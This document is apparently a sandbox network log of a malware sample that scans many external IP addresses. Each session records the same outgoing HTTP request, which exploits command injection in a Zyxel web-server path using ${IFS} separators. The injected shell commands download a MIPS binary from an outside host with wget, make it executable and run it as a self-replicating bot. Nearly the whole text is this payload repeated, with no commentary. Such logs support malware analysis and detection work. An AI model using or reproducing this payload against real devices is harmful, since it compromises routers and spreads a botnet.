                                                  Jan 19, 2024 18:24:07.285108089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7205192.168.2.135458291.95.112.220443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.285144091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7206192.168.2.135688812.227.248.100443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.285185099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7207192.168.2.1336194160.84.160.41443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.285207987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7208192.168.2.1359894110.250.144.154443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.285242081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7209192.168.2.134731849.13.92.46443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.285300970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7210192.168.2.1334842173.233.248.125443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.285332918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7211192.168.2.133534296.32.49.150443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.285365105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7212192.168.2.1354648201.3.189.36443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.285423040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7213192.168.2.1353518101.82.109.246443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.285449982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7214192.168.2.135467490.236.82.44443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.285475969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7215192.168.2.1341244159.46.195.159443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.285509109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7216192.168.2.1360644175.146.211.170443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.285557985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7217192.168.2.135898050.112.155.164443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.285604000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7218192.168.2.1359582211.47.193.25443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.285654068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7219192.168.2.13399184.189.213.20443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.285682917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7220192.168.2.134094043.137.124.247443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.285718918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7221192.168.2.1333532121.155.244.167443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.285744905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7222192.168.2.1350800107.123.151.207443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.285768032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7223192.168.2.1338708194.237.149.83443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.285797119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7224192.168.2.135791241.165.108.119443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.285845995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7225192.168.2.1337366126.33.48.178443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.285891056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7226192.168.2.1338882198.1.221.254443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.285923958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7227192.168.2.134384253.220.118.87443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.285958052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7228192.168.2.1356004193.202.183.221443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.285979986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7229192.168.2.1359114160.7.250.169443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.286021948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7230192.168.2.135053294.38.218.144443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.286057949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7231192.168.2.1343400157.109.168.198443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.286103010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7232192.168.2.133352488.145.251.28443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.286128998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7233192.168.2.1347062202.211.121.190443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.286159992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7234192.168.2.1357348140.51.15.67443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.286206007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7235192.168.2.1353870188.91.28.183443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.286238909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7236192.168.2.13411768.113.81.124443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.286283970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7237192.168.2.1350740123.222.88.254443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.286303043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7238192.168.2.1337864217.224.127.5443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.286324978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7239192.168.2.1340896179.97.14.138443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.286376953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7240192.168.2.1347072199.138.69.17443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.286423922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7241192.168.2.135330865.172.105.163443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.286463976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7242192.168.2.133489498.185.199.74443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.286504984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7243192.168.2.1358512213.109.104.226443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.286540031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7244192.168.2.134025494.215.114.170443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.286597013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7245192.168.2.135424851.118.146.25443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.286624908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7246192.168.2.135034464.179.117.33443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.286673069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7247192.168.2.1349034151.207.28.143443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.286710024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7248192.168.2.1344708104.231.14.66443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.286753893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7249192.168.2.1355920114.213.246.22443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.286808014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7250192.168.2.1353202175.141.31.139443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.286837101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7251192.168.2.135545247.185.22.16443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.286874056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7252192.168.2.134168058.192.49.67443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.286916018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7253192.168.2.1335236119.88.74.55443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.286956072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7254192.168.2.1346082204.138.75.116443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.286999941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7255192.168.2.135379014.142.32.40443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.287035942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7256192.168.2.1360332164.77.185.35443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.287070990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7257192.168.2.135320695.2.226.161443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.287138939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7258192.168.2.1354776114.174.223.133443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.287154913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7259192.168.2.1351920117.182.189.53443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.287199974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7260192.168.2.1355394211.117.13.124443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.287228107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7261192.168.2.1334382153.41.74.94443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.287283897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7262192.168.2.133848478.136.171.18443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.287323952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7263192.168.2.134601858.244.156.145443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.287369013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7264192.168.2.1341066185.13.104.147443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.287414074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7265192.168.2.133946485.163.198.60443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.287441969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7266192.168.2.1337606148.105.234.82443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.287468910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7267192.168.2.134280862.5.98.253443
                                                  TimestampBytes transferredDirectionData
